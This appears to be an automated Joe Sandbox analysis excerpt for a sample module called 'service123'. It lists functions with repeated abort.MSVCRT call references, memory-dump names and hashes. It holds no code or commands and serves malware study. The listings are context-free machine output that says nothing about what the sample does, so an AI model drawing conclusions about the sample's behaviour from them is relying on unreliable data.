abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D44
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D4C
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D51
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D56
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D60
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D65
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D7E

Strings

V:<l, xrefs: 6C2E2A5E

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: abort
String ID: V:<l
API String ID: 4206212132-1929532744
Opcode ID: 1b3855566e480912fc2b388d910f1844d4d668d5db024e59eb9dae236bac5bb5
Instruction ID: 794a835b95efe0c8547f3f00b749ffcbb53ad469a690d3ebd18a51f914655b34
Opcode Fuzzy Hash: 1b3855566e480912fc2b388d910f1844d4d668d5db024e59eb9dae236bac5bb5
Instruction Fuzzy Hash: 8211E5B2642205CBE708FF18E491F59B7B0FB21309F009A58D584D7A12D738E828CF91

Function 6C2E29B1 Relevance: 50.8, APIs: 28, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6C3B6CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D44
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D4C
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D51
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D56
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D60
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D65
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D7E

Strings

`:<l, xrefs: 6C2E29E0

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: abort
String ID: `:<l
API String ID: 4206212132-3295300052
Opcode ID: a18156d3b2daeeb35bd2c3b070c02779f7c0eabf1cfa4a39aee86af9d8c78aeb
Instruction ID: 41d00888face4ff4bca0b10ad3db07d44cdcb37bc3e003b5d0709697dce8257e
Opcode Fuzzy Hash: a18156d3b2daeeb35bd2c3b070c02779f7c0eabf1cfa4a39aee86af9d8c78aeb
Instruction Fuzzy Hash: 78F06DB1545205CBD704EF18D094B6AB770FF12308F009A48C845ABB02D735E469CF81

Function 6C2EBAD0 Relevance: 47.6, APIs: 26, Strings: 1, Instructions: 339COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D44
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D4C
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D51
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D56
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D60
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D65
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D7E

Strings

@, xrefs: 6C2EBAB1

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: abort
String ID: @
API String ID: 4206212132-2766056989
Opcode ID: ad6b6ec9f5d9d76f87445d786e98e0b3c00693a0e7f4bd8be1654b5d76df0f23
Instruction ID: a2de727137745387061ca64e76eaf7a29804abbcdfd04d81a215fd94ba4a7185
Opcode Fuzzy Hash: ad6b6ec9f5d9d76f87445d786e98e0b3c00693a0e7f4bd8be1654b5d76df0f23
Instruction Fuzzy Hash: E4B12532A0931E8FC710DE2CC4A0759B7E6AB89314F85496DED94A7F96D335EC08CB85

Function 6C2E2290 Relevance: 42.4, APIs: 28, Instructions: 354COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b74045ea3c4b86cfbc1c08a9c0c5e63aedda8886c618107f0f3adc5ecf099061
Instruction ID: f6ef23913ef182aba77dec99da29bdd46b0f51826560dcc22751695d2e6a9826
Opcode Fuzzy Hash: b74045ea3c4b86cfbc1c08a9c0c5e63aedda8886c618107f0f3adc5ecf099061
Instruction Fuzzy Hash: F7C1E5B160020A8FD704CF29C48479AB7E1BF49308F859569DC8AEFB46D735E945CFA0

Function 6C2EB7A0 Relevance: 42.2, APIs: 28, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86b7badc533daab3ccbe06e6f107dbb73bf0861e75d3e6b0fb7e65255ed4d746
Instruction ID: 878a02057919dfbe3c6f11474cdcf30b3bdedf08754e4bb1e62dc367d19b6eaf
Opcode Fuzzy Hash: 86b7badc533daab3ccbe06e6f107dbb73bf0861e75d3e6b0fb7e65255ed4d746
Instruction Fuzzy Hash: 6341F47660934A9FE711DF2AC0C07167BF0AF4A318F58859DED956BB42C331E845CB45

Function 6C2E29F0 Relevance: 42.1, APIs: 28, Instructions: 78COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6C3B6CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D44
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D4C
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D51
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D56
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D60
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D65
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D7E

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: cbd5d640c85932515a7f2863200e21cb691f6101ebe35d118a39f281ee5a682f
Instruction ID: 495a85bcfca2359b4500e47ae051e201e7c3ada868d845d495d58f548b7b3ff0
Opcode Fuzzy Hash: cbd5d640c85932515a7f2863200e21cb691f6101ebe35d118a39f281ee5a682f
Instruction Fuzzy Hash: 120128B2641205CFE708FF28E885B69B7B0FB11309F009A58C585EBA12D734E868CF91

Function 6C2E28BB Relevance: 42.1, APIs: 28, Instructions: 73COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6C3B6CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D44
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D4C
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D51
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D56
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D60
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D65
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D7E

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 79748be18673680e57428dea60d68a15b40c70fe2a1ac807c076324be7569995
Instruction ID: 703f243f6d2d4efe66fb8404cb4a4f72ddc72c827669f970c07921e52e0f6e78
Opcode Fuzzy Hash: 79748be18673680e57428dea60d68a15b40c70fe2a1ac807c076324be7569995
Instruction Fuzzy Hash: A4013CB1546205CBE708FF18D4D1B6AB7B0FB11309F009A58C985ABB02C735E869CF91

Function 6C2E2A6E Relevance: 42.1, APIs: 28, Instructions: 71COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6C3B6CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D44
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D4C
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D51
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D56
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D60
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D65
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D7E

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 33626247313be4075dae0448d9676fad006df2a8ee98301cec07d296bf9dadf0
Instruction ID: 615d4b8c4a097624d330c80ffcdc1b3ff7d0c6597c6c9302e2ab822ae2add4d9
Opcode Fuzzy Hash: 33626247313be4075dae0448d9676fad006df2a8ee98301cec07d296bf9dadf0
Instruction Fuzzy Hash: 7D0149B1545209CBE708FF18D4D1B6AB7B0FB16308F009A48C895ABB06C735E468CF91

Function 6C2E2B13 Relevance: 42.1, APIs: 28, Instructions: 69COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6C3B6CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D1C
